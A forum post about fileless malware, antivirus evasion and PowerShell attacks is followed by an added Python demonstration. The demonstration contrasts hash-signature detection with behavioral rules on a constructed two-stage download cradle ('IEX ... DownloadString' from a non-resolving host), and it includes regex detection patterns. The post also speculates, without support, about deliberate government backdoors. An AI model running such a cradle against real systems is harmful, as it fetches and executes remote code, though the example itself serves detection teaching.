06-29-2024, 09:47 AM
If you think that's scary, I can make fileless malware that runs in your registry and injects into memory to bypass EDR. Almost all malware now is two-stage malware; it started with macros in Word and has progressed since then. Technically it started in PDF, but that wasn't two-stage. That was in 2011 or so, when we were encoding files using shikata_ga_nai to obfuscate them. Back then the only thing that caught it was Trend Micro, but if you change the signature you change the malware. Antivirus can only protect against known signatures. Other methods are watching behaviors, like PowerShell. Windows Defender nowadays is starting to block PowerShell scripts: about damn time, but years too damn late. The truth is nothing's ever safe, nothing ever will be, and I'm fairly positive holes are put into software on purpose for government use. What was the Internet, after all, before it was released to the public?
"I thought what I'd do was, I'd pretend I was one of those deaf-mutes."
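An added illustration of the signature-versus-behavior point made in the post above (example code written for this page, not the poster's own). It stores a hash of a constructed two-stage PowerShell download cradle as a "signature", shows that a trivial edit to the cradle breaks the signature match, and then runs a small set of behavioral rules over the process command line, decoding `-EncodedCommand` first so that the encoding itself buys the attacker nothing. The cradle string, the `example.invalid` host (a reserved name that does not resolve) and the rule names are all constructed for the demonstration.

```python
"""Signature vs behaviour detection on a PowerShell download cradle.

Added example, not code from the original forum post. The sample command
below is constructed for the demonstration and points at a reserved,
non-resolving hostname.
"""
import base64
import hashlib
import re

# Constructed two-stage cradle: stage one pulls stage two and runs it in memory.
STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"

# A cosmetically different variant with identical behaviour.
VARIANT = STAGE1.replace("Net.WebClient", "System.Net.WebClient")

# Naive "antivirus": a set of full-content hashes of known samples.
KNOWN_HASHES = {hashlib.sha256(STAGE1.encode()).hexdigest()}


def signature_match(script: str) -> bool:
    """True only if the exact bytes have been seen before."""
    return hashlib.sha256(script.encode()).hexdigest() in KNOWN_HASHES


def encode_for_powershell(script: str) -> str:
    """Produce the -EncodedCommand payload: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16le")).decode()


def decode_encoded_command(b64: str) -> str:
    """Inverse of encode_for_powershell."""
    return base64.b64decode(b64).decode("utf-16le")


# Behavioural indicators, matched against the decoded command line.
BEHAVIOUR_RULES = {
    "download-cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I),
    "in-memory-exec": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden-window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
}

# -e, -enc and -EncodedCommand all accept a base64 argument.
ENC_FLAG = re.compile(r"-e(nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def behaviour_match(cmdline: str) -> list[str]:
    """Return the names of the behavioural rules that fire on a command line.

    If the command line carries an encoded command, the decoded script is
    appended to the text being inspected before the rules run.
    """
    text = cmdline
    m = ENC_FLAG.search(cmdline)
    if m:
        try:
            text = cmdline + " " + decode_encoded_command(m.group(2))
        except (ValueError, UnicodeDecodeError):
            pass  # malformed base64: fall back to the raw command line
    return sorted(name for name, rx in BEHAVIOUR_RULES.items() if rx.search(text))


def demo() -> dict:
    """Compare both approaches on the original sample and on the variant."""
    encoded = "powershell -nop -w hidden -enc " + encode_for_powershell(VARIANT)
    return {
        "signature_original": signature_match(STAGE1),
        "signature_variant": signature_match(VARIANT),
        "behaviour_variant": behaviour_match(encoded),
        "behaviour_benign": behaviour_match("powershell -Command Get-ChildItem"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The one-word edit in `VARIANT` is enough to defeat the hash, which is the "change the signature, change the malware" point; the behavioral rules still fire because they look at what the command does (fetch remote content, run it via `IEX`, hide the window) rather than at its bytes. Real EDR rules are broader and also consume script-block logging and AMSI content, but the shape is the same.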